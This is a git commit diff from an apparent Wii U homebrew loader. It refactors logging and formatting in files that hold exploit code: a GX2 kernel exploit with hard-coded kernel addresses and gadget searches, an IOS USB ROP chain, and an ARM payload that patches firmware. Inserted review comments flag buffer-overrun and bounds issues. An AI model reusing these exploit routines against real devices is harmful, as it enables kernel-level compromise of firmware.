Removed unused code, optimize logging, formatting, fix compiler warnings

Maschell 2020-08-21 23:03:53 +02:00
parent 4cc24eda59
commit 3091afdd81
15 changed files with 125 additions and 651 deletions


@ -2,22 +2,21 @@
#include <string.h> #include <string.h>
#include <coreinit/debug.h> #include <coreinit/debug.h>
#include <coreinit/thread.h>
#include <coreinit/cache.h> #include <coreinit/cache.h>
#include <coreinit/memdefaultheap.h> #include <coreinit/memdefaultheap.h>
#include <whb/sdcard.h> #include <whb/sdcard.h>
#include <whb/file.h> #include <whb/file.h>
#include <whb/log.h> #include <whb/log.h>
#include <utils/logger.h>
#include "elf_abi.h" #include "elf_abi.h"
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) {
char path[256]; char path[256];
int result = 0; int result = 0;
char *sdRootPath = ""; char *sdRootPath = "";
if (!WHBMountSdCard()) { if (!WHBMountSdCard()) {
WHBLogPrintf("Failed to mount SD Card..."); DEBUG_FUNCTION_LINE("Failed to mount SD Card...");
result = -1; result = -1;
goto exit; goto exit;
} }
@ -25,12 +24,12 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si
sdRootPath = WHBGetSdCardMountPath(); sdRootPath = WHBGetSdCardMountPath();
sprintf(path, "%s/%s", sdRootPath, relativefilepath); sprintf(path, "%s/%s", sdRootPath, relativefilepath);
WHBLogPrintf("Loading file %s.", path); DEBUG_FUNCTION_LINE("Loading file %s.", path);
*fileOut = WHBReadWholeFile(path, sizeOut); *fileOut = WHBReadWholeFile(path, sizeOut);
if (!(*fileOut)) { if (!(*fileOut)) {
result = -2; result = -2;
WHBLogPrintf("WHBReadWholeFile(%s) returned NULL", path); DEBUG_FUNCTION_LINE("WHBReadWholeFile(%s) returned NULL", path);
goto exit; goto exit;
} }
@ -74,16 +73,19 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned
for (i = 0; i < ehdr->e_shnum; i++) { for (i = 0; i < ehdr->e_shnum; i++) {
const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name; const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name;
if (strcmp(section_name, name) == 0) { if (strcmp(section_name, name) == 0) {
if (addr) if (addr) {
*addr = shdr[i].sh_addr; *addr = shdr[i].sh_addr;
if (size) }
if (size) {
*size = shdr[i].sh_size; *size = shdr[i].sh_size;
}
return shdr[i].sh_offset; return shdr[i].sh_offset;
} }
} }
if (fail_on_not_found) if (fail_on_not_found) {
OSFatal((char *) name); OSFatal((char *) name);
}
return 0; return 0;
} }
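Review bot: `sprintf(path, "%s/%s", sdRootPath, relativefilepath)` in LoadFileToMem still writes into the fixed `char path[256]` with no bound, so a long relative path appended to the mount path overruns the stack buffer; the hunk only swapped the logging calls around it. Replace it with `int n = snprintf(path, sizeof path, "%s/%s", sdRootPath, relativefilepath);` followed by `if (n < 0 || (size_t) n >= sizeof path) { result = -1; goto exit; }`. In the same file, get_section indexes `shdr[ehdr->e_shstrndx]` and adds `sh_name`/`sh_offset` straight out of the image without checking them against the loaded size, which matters because the ELF comes from the SD card and is untrusted input. LoadFileToMem continues past the hunk and get_section begins before it.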


@ -1,5 +1,4 @@
#ifndef ELF_LOADING_H #pragma once
#define ELF_LOADING_H
#include <stdint.h> #include <stdint.h>
@ -13,6 +12,3 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif
#endif /* ELF_LOADING_H */


@ -14,46 +14,20 @@
#include <string.h> #include <string.h>
#include "ElfUtils.h" #include "ElfUtils.h"
#include "gx2sploit.h" #include "gx2sploit.h"
#include "utils/utils.h"
#define JIT_ADDRESS 0x01800000
#define KERN_HEAP 0xFF200000
#define KERN_HEAP_PHYS 0x1B800000
#define JIT_ADDRESS 0x01800000 #define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_HEAP 0xFF200000 #define STARTID_OFFSET 0x08
#define KERN_HEAP_PHYS 0x1B800000 #define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_ADDRESS_TBL 0xFFEAB7A0
#define STARTID_OFFSET 0x08
#define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define BAT_SETUP_HOOK_ADDR 0xFFF1D624
#define BAT_SETUP_HOOK_ENTRY 0x00880000
#define BAT4U_VAL 0x008000FF
#define BAT4L_VAL 0x30800012
#define BAT_SET_NOP_ADDR_1 0xFFF06B6C
#define BAT_SET_NOP_ADDR_2 0xFFF06BF8
#define BAT_SET_NOP_ADDR_3 0xFFF003C8
#define BAT_SET_NOP_ADDR_4 0xFFF003CC
#define BAT_SET_NOP_ADDR_5 0xFFF1D70C
#define BAT_SET_NOP_ADDR_6 0xFFF1D728
#define BAT_SET_NOP_ADDR_7 0xFFF1D82C
#define BAT_SET_NOP_ADDR_8 0xFFEE11C4
#define BAT_SET_NOP_ADDR_9 0xFFEE11C8
#define ADDRESS_main_entry_hook 0x0101c56c
#define ADDRESS_OSTitle_main_entry_ptr 0x1005E040
#define NOP_ADDR(addr) \
*(uint32_t*)addr = 0x60000000; \
asm volatile("dcbf 0, %0; icbi 0, %0" : : "r" (addr & ~31));
extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len);
@ -63,8 +37,9 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
/* Search code before JIT area first */ /* Search code before JIT area first */
for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) { for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) {
if (!memcmp(ptr, &code[0], length)) if (!memcmp(ptr, &code[0], length)) {
return ptr; return ptr;
}
} }
OSFatal("Failed to find gadget!"); OSFatal("Failed to find gadget!");
@ -131,7 +106,7 @@ int exploitThread(int argc, char **argv) {
uint32_t gx2data[] = {0xfc2a0000}; uint32_t gx2data[] = {0xfc2a0000};
uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14; void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14);
/* Modify a next ptr on the heap */ /* Modify a next ptr on the heap */
uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
@ -185,8 +160,8 @@ extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len);
void KernelWrite(uint32_t addr, const void *data, uint32_t length) { void KernelWrite(uint32_t addr, const void *data, uint32_t length) {
// This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?) // This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?)
// further testing required. // further testing required.
for (int32_t i = 0; i < length; i += 4) { for (uint32_t i = 0; i < length; i += 4) {
KernelWriteU32(addr + i, *(uint32_t *) (data + i)); KernelWriteU32(addr + i, *(uint32_t *) (((uint32_t) data) + i));
} }
} }
@ -203,17 +178,6 @@ void KernelWriteU32(uint32_t addr, uint32_t value) {
ICInvalidateRange((void *) addr, 4); ICInvalidateRange((void *) addr, 4);
} }
void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value) {
ICInvalidateRange(&value, 4);
DCFlushRange(&value, 4);
uint32_t dst = (uint32_t) addr;
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value);
SC_KernelCopyData(dst, src, 4);
}
static void SCSetupIBAT4DBAT5() { static void SCSetupIBAT4DBAT5() {
asm volatile("sync; eieio; isync"); asm volatile("sync; eieio; isync");
@ -236,7 +200,6 @@ static void SCSetupIBAT4DBAT5() {
extern "C" void SC_0x36_SETBATS(void); extern "C" void SC_0x36_SETBATS(void);
int DoKernelExploit(void) { int DoKernelExploit(void) {
WHBLogPrintf("Running GX2Sploit"); WHBLogPrintf("Running GX2Sploit");
/* Make a thread to modify the semaphore */ /* Make a thread to modify the semaphore */
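Review bot: The reworked loop in KernelWrite, `for (uint32_t i = 0; i < length; i += 4)`, still copies whole words, so a `length` that is not a multiple of 4 reads up to three bytes past the end of `data` and writes them past `addr + length` into kernel memory; changing the index to unsigned does not address that. At minimum state the precondition above the loop, `// length must be a multiple of 4: the final word is always written in full`, or reject such lengths before entering it. Separately, `WHBLogPrintf("Running GX2Sploit")` in DoKernelExploit is left on the old logging call while the rest of the commit moved to DEBUG_FUNCTION_LINE. KernelWrite sits wholly inside the hunk; DoKernelExploit continues past it.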


@ -1,6 +1,5 @@
#pragma once #pragma once
#ifdef __cplusplus #ifdef __cplusplus
extern "C" { extern "C" {
#endif #endif
@ -13,7 +12,6 @@ extern "C" {
int DoKernelExploit(void); int DoKernelExploit(void);
void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value);
void KernelWrite(uint32_t addr, const void *data, uint32_t length); void KernelWrite(uint32_t addr, const void *data, uint32_t length);
void kern_write(const void *addr, uint32_t value); void kern_write(const void *addr, uint32_t value);
@ -21,9 +19,6 @@ extern int32_t Register(char *driver_name, uint32_t name_length, void *buf1, voi
extern void CopyToSaveArea(char *driver_name, uint32_t name_length, void *buffer, uint32_t length); extern void CopyToSaveArea(char *driver_name, uint32_t name_length, void *buffer, uint32_t length);
extern void set_semaphore_phys(uint32_t set_semaphore, uint32_t kpaddr, uint32_t gx2data_addr); extern void set_semaphore_phys(uint32_t set_semaphore, uint32_t kpaddr, uint32_t gx2data_addr);
extern void SC0x25_SetupSyscall(void);
extern unsigned int SC0x65_ExploitCheck(unsigned int in);
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif


@ -5,19 +5,12 @@
#include <coreinit/ios.h> #include <coreinit/ios.h>
#include "ios_exploit.h" #include "ios_exploit.h"
#define ALIGN4(x) (((x) + 3) & ~3)
#define CHAIN_START 0x1016AD40 #define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
#define SOURCE (0x120000) #define SOURCE (0x120000)
#define IOS_CREATETHREAD 0x1012EABC #define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000 #define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC #define REPLACE_SYSCALL 0x081298BC
extern const uint8_t launch_image_tga[];
extern const uint32_t launch_image_tga_size;
static void uhs_exploit_init(int uhs_handle); static void uhs_exploit_init(int uhs_handle);
static int uhs_write32(int uhs_handle, int arm_addr, int val); static int uhs_write32(int uhs_handle, int arm_addr, int val);
@ -237,7 +230,7 @@ static const int final_chain[] = {
0x0, // 0x1F0 0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC} 0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8 0x0, // 0x1F8
sizeof(ios_kernel), // 0x1FC our code size sizeof(ios_kernel),// 0x1FC our code size
0x0, // 0x200 0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x00140000, // 0x208 our code source location 0x00140000, // 0x208 our code source location
@ -326,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
} }
static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
OSSleepTicks(0x200000); //! Improves stability OSSleepTicks(0x200000); //! Improves stability
int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
int output_buffer[32]; int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
} }
@ -337,13 +330,7 @@ static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
int ExecuteIOSExploit() { int ExecuteIOSExploit() {
int iosuhaxFd = IOS_Open("/dev/iosuhax", 0); int iosuhaxFd = IOS_Open("/dev/iosuhax", 0);
if (iosuhaxFd >= 0) { if (iosuhaxFd >= 0) {
int dummy = 0;
//IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
//! do not run patches again as that will most likely crash //! do not run patches again as that will most likely crash
//! because the wupserver and the iosuhax dev node are still running
//! just relaunch IOS with new configuration
IOS_Close(iosuhaxFd); IOS_Close(iosuhaxFd);
return 0; return 0;
} }
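Review bot: `DCStoreRange(ayylmao, 521 * 4)` in uhs_write32 hard-codes the byte count that the `ayylmao[520]` store on the line above depends on; if `ayylmao` is declared as a plain array (its definition is outside this hunk), `DCStoreRange(ayylmao, sizeof(ayylmao))` keeps the two from drifting apart, and the `adress` typo in that line's comment can be fixed in passing. The surviving `//! do not run patches again as that will most likely crash` in ExecuteIOSExploit has lost the lines explaining why (the wupserver and the iosuhax node still running), which is the justification for the early `return 0`; consider keeping that sentence rather than only the warning. uhs_exploit_init and the final_chain table begin before this hunk.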


@ -1,5 +1,4 @@
#ifndef _IOS_EXPLOIT_H_ #pragma once
#define _IOS_EXPLOIT_H_
#ifdef __cplusplus #ifdef __cplusplus
extern "C" { extern "C" {
@ -10,5 +9,3 @@ int ExecuteIOSExploit();
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif
#endif


@ -29,14 +29,13 @@
#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) #define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000)
void instant_patches_setup(void) { void instant_patches_setup(void) {
// fix 10 minute timeout that crashes MCP after 10 minutes of booting // fix 10 minute timeout that crashes MCP after 10 minutes of booting
*(volatile u32*)(0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT
// patch default title id to system menu // patch default title id to system menu
*(volatile u32*)mcp_data_phys(0x050B817C) = *(volatile u32*)0x0017FFF0; *(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0;
*(volatile u32*)mcp_data_phys(0x050B8180) = *(volatile u32*)0x0017FFF4; *(volatile u32 *) mcp_data_phys(0x050B8180) = *(volatile u32 *) 0x0017FFF4;
// force check USB storage on load // force check USB storage on load
*(volatile u32*)acp_phys(0xE012202C) = 0x00000001; // find USB flag *(volatile u32 *) acp_phys(0xE012202C) = 0x00000001; // find USB flag
} }


@ -27,78 +27,76 @@
#define USB_PHYS_CODE_BASE 0x101312D0 #define USB_PHYS_CODE_BASE 0x101312D0
typedef struct typedef struct {
{
u32 size; u32 size;
u8 data[0]; u8 data[0];
} payload_info_t; } payload_info_t;
static const char repairData_set_fault_behavior[] = { static const char repairData_set_fault_behavior[] = {
0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00,
0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02,
0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D, 0xE1, 0x53, 0x00, 0x00, 0xE3, 0xE0, 0x00, 0x00, 0x18, 0xBD, 0x80, 0x30, 0xE3, 0x54, 0x00, 0x0D,
}; };
static const char repairData_set_panic_behavior[] = { static const char repairData_set_panic_behavior[] = {
0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70, 0x08, 0x16, 0x6C, 0x00, 0x00, 0x00, 0x18, 0x0C, 0x08, 0x14, 0x40, 0x00, 0x00, 0x00, 0x9D, 0x70,
0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00, 0x08, 0x16, 0x84, 0x0C, 0x00, 0x00, 0xB4, 0x0C, 0x00, 0x00, 0x01, 0x01, 0x08, 0x14, 0x40, 0x00,
0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4, 0x08, 0x15, 0x00, 0x00, 0x08, 0x17, 0x21, 0x80, 0x08, 0x17, 0x38, 0x00, 0x08, 0x14, 0x30, 0xD4,
0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94, 0x08, 0x14, 0x12, 0x50, 0x08, 0x14, 0x12, 0x94, 0xE3, 0xA0, 0x35, 0x36, 0xE5, 0x93, 0x21, 0x94,
0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E, 0xE3, 0xC2, 0x2E, 0x21, 0xE5, 0x83, 0x21, 0x94, 0xE5, 0x93, 0x11, 0x94, 0xE1, 0x2F, 0xFF, 0x1E,
0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00, 0xE5, 0x9F, 0x30, 0x1C, 0xE5, 0x9F, 0xC0, 0x1C, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x10, 0x00,
0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00, 0xE5, 0x92, 0x30, 0x54, 0xE5, 0x9C, 0x00, 0x00,
}; };
static const char repairData_usb_root_thread[] = { static const char repairData_usb_root_thread[] = {
0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10, 0xE5, 0x8D, 0xE0, 0x04, 0xE5, 0x8D, 0xC0, 0x08, 0xE5, 0x8D, 0x40, 0x0C, 0xE5, 0x8D, 0x60, 0x10,
0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3, 0xEB, 0x00, 0xB2, 0xFD, 0xEA, 0xFF, 0xFF, 0xC9, 0x10, 0x14, 0x03, 0xF8, 0x10, 0x62, 0x4D, 0xD3,
0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90, 0x10, 0x14, 0x50, 0x00, 0x10, 0x14, 0x50, 0x20, 0x10, 0x14, 0x00, 0x00, 0x10, 0x14, 0x00, 0x90,
0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8, 0x10, 0x14, 0x00, 0x70, 0x10, 0x14, 0x00, 0x98, 0x10, 0x14, 0x00, 0x84, 0x10, 0x14, 0x03, 0xE8,
0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0, 0x10, 0x14, 0x00, 0x3C, 0x00, 0x00, 0x01, 0x73, 0x00, 0x00, 0x01, 0x76, 0xE9, 0x2D, 0x4F, 0xF0,
0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03, 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03,
0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20, 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20,
}; };
int _main() int _main() {
{ void (*invalidate_icache)() = (void (*)()) 0x0812DCF0;
void(*invalidate_icache)() = (void(*)())0x0812DCF0; void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164;
void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164; void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160;
void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160;
flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache
int level = disable_interrupts(); int level = disable_interrupts();
unsigned int control_register = disable_mmu(); unsigned int control_register = disable_mmu();
/* Save the request handle so we can reply later */ /* Save the request handle so we can reply later */
*(volatile u32*)0x0012F000 = *(volatile u32*)0x1016AD18; *(volatile u32 *) 0x0012F000 = *(volatile u32 *) 0x1016AD18;
/* Patch kernel_error_handler to BX LR immediately */ /* Patch kernel_error_handler to BX LR immediately */
*(volatile u32*)0x08129A24 = 0xE12FFF1E; *(volatile u32 *) 0x08129A24 = 0xE12FFF1E;
void * pset_fault_behavior = (void*)0x081298BC; void *pset_fault_behavior = (void *) 0x081298BC;
kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); kernel_memcpy(pset_fault_behavior, (void *) repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior));
void * pset_panic_behavior = (void*)0x081296E4; void *pset_panic_behavior = (void *) 0x081296E4;
kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); kernel_memcpy(pset_panic_behavior, (void *) repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior));
void * pusb_root_thread = (void*)0x10100174; void *pusb_root_thread = (void *) 0x10100174;
kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); kernel_memcpy(pusb_root_thread, (void *) repairData_usb_root_thread, sizeof(repairData_usb_root_thread));
payload_info_t *payloads = (payload_info_t*)0x00148000; payload_info_t *payloads = (payload_info_t *) 0x00148000;
kernel_memcpy((void*)USB_PHYS_CODE_BASE, payloads->data, payloads->size); kernel_memcpy((void *) USB_PHYS_CODE_BASE, payloads->data, payloads->size);
// run all instant patches as necessary // run all instant patches as necessary
instant_patches_setup(); instant_patches_setup();
*(volatile u32*)(0x1555500) = 0; *(volatile u32 *) (0x1555500) = 0;
/* REENABLE MMU */ /* REENABLE MMU */
restore_mmu(control_register); restore_mmu(control_register);
invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache
invalidate_icache(); invalidate_icache();
enable_interrupts(level); enable_interrupts(level);
return 0; return 0;
} }


@ -23,38 +23,33 @@
***************************************************************************/ ***************************************************************************/
// this memcpy is optimized for speed and to work with MEM1 32 bit access alignment requirement // this memcpy is optimized for speed and to work with MEM1 32 bit access alignment requirement
void reverse_memcpy(void* dst, const void* src, unsigned int size) void reverse_memcpy(void *dst, const void *src, unsigned int size) {
{
const unsigned char *src_p; const unsigned char *src_p;
unsigned char *dst_p; unsigned char *dst_p;
if((size >= 4) && !((dst - src) & 3)) if ((size >= 4) && !((dst - src) & 3)) {
{
const unsigned int *src_p32; const unsigned int *src_p32;
unsigned int *dst_p32; unsigned int *dst_p32;
unsigned int endDst = ((unsigned int)dst) + size; unsigned int endDst = ((unsigned int) dst) + size;
unsigned int endRest = endDst & 3; unsigned int endRest = endDst & 3;
if(endRest) if (endRest) {
{ src_p = ((const unsigned char *) (src + size)) - 1;
src_p = ((const unsigned char*)(src + size)) - 1; dst_p = ((unsigned char *) endDst) - 1;
dst_p = ((unsigned char*)endDst) - 1;
size -= endRest; size -= endRest;
while(endRest--) while (endRest--)
*dst_p-- = *src_p--; *dst_p-- = *src_p--;
} }
src_p32 = ((const unsigned int*)(src + size)) - 1; src_p32 = ((const unsigned int *) (src + size)) - 1;
dst_p32 = ((unsigned int*)(dst + size)) - 1; dst_p32 = ((unsigned int *) (dst + size)) - 1;
unsigned int size32 = size >> 5; unsigned int size32 = size >> 5;
if(size32) if (size32) {
{
size &= 0x1F; size &= 0x1F;
while(size32--) while (size32--) {
{
src_p32 -= 8; src_p32 -= 8;
dst_p32 -= 8; dst_p32 -= 8;
@ -70,23 +65,20 @@ void reverse_memcpy(void* dst, const void* src, unsigned int size)
} }
unsigned int size4 = size >> 2; unsigned int size4 = size >> 2;
if(size4) if (size4) {
{
size &= 3; size &= 3;
while(size4--) while (size4--)
*dst_p32-- = *src_p32--; *dst_p32-- = *src_p32--;
} }
dst_p = ((unsigned char*)dst_p32) + 3; dst_p = ((unsigned char *) dst_p32) + 3;
src_p = ((const unsigned char*)src_p32) + 3; src_p = ((const unsigned char *) src_p32) + 3;
} } else {
else dst_p = ((unsigned char *) dst) + size - 1;
{ src_p = ((const unsigned char *) src) + size - 1;
dst_p = ((unsigned char*)dst) + size - 1;
src_p = ((const unsigned char*)src) + size - 1;
} }
while(size--) while (size--)
*dst_p-- = *src_p--; *dst_p-- = *src_p--;
} }


@ -1,24 +1,24 @@
void _main() void _main() {
{
void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C; void (*ios_shutdown)(int) = (void (*)(int)) 0x1012EE4C;
int(*reply)(int, int) = (int(*)(int, int))0x1012ED04; int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04;
int saved_handle = *(volatile int*)0x0012F000; int saved_handle = *(volatile int *) 0x0012F000;
int myret = reply(saved_handle, 0); int myret = reply(saved_handle, 0);
if (myret != 0) if (myret != 0) {
ios_shutdown(1); ios_shutdown(1);
}
// stack pointer will be 0x1016AE30 // stack pointer will be 0x1016AE30
// link register will be 0x1012EACC // link register will be 0x1012EACC
asm("LDR SP, newsp\n" asm("LDR SP, newsp\n"
"LDR R0, newr0\n" "LDR R0, newr0\n"
"LDR LR, newlr\n" "LDR LR, newlr\n"
"LDR PC, newpc\n" "LDR PC, newpc\n"
"newsp: .word 0x1016AE30\n" "newsp: .word 0x1016AE30\n"
"newlr: .word 0x1012EACC\n" "newlr: .word 0x1012EACC\n"
"newr0: .word 0x10146080\n" "newr0: .word 0x10146080\n"
"newpc: .word 0x10111164\n"); "newpc: .word 0x10111164\n");
} }


@ -1,41 +1,24 @@
#include <stdio.h> #include <stdio.h>
#include <string.h> #include <string.h>
#include <vector>
#include <coreinit/ios.h>
#include <coreinit/time.h> #include <coreinit/time.h>
#include <coreinit/systeminfo.h>
#include <coreinit/foreground.h> #include <coreinit/foreground.h>
#include <nsysnet/socket.h>
#include <proc_ui/procui.h> #include <proc_ui/procui.h>
#include <coreinit/thread.h> #include <coreinit/thread.h>
#include <whb/proc.h>
#include <whb/log.h> #include <whb/log.h>
#include <whb/log_udp.h> #include <whb/log_udp.h>
#include <sysapp/launch.h> #include <sysapp/launch.h>
#include <coreinit/exit.h> #include <sysapp/title.h>
#include <coreinit/cache.h> #include <coreinit/cache.h>
#include <coreinit/dynload.h>
#include <vpad/input.h> #include <vpad/input.h>
#include "utils/logger.h" #include "utils/logger.h"
#include "utils/utils.h"
#include "ElfUtils.h" #include "ElfUtils.h"
#include "ios_exploit.h" #include "ios_exploit.h"
#include "gx2sploit.h" #include "gx2sploit.h"
#ifdef __cplusplus
extern "C" {
#endif
#ifdef __cplusplus
}
#endif
bool CheckRunning() { bool CheckRunning() {
switch (ProcUIProcessMessages(true)) { switch (ProcUIProcessMessages(true)) {
@ -56,8 +39,6 @@ bool CheckRunning() {
return true; return true;
} }
extern "C" uint64_t _SYSGetSystemApplicationTitleId(int);
int main(int argc, char **argv) { int main(int argc, char **argv) {
WHBLogUdpInit(); WHBLogUdpInit();
@ -105,13 +86,13 @@ int main(int argc, char **argv) {
DEBUG_FUNCTION_LINE("ProcUIInit done"); DEBUG_FUNCTION_LINE("ProcUIInit done");
if (loadWithoutHacks) { if (loadWithoutHacks) {
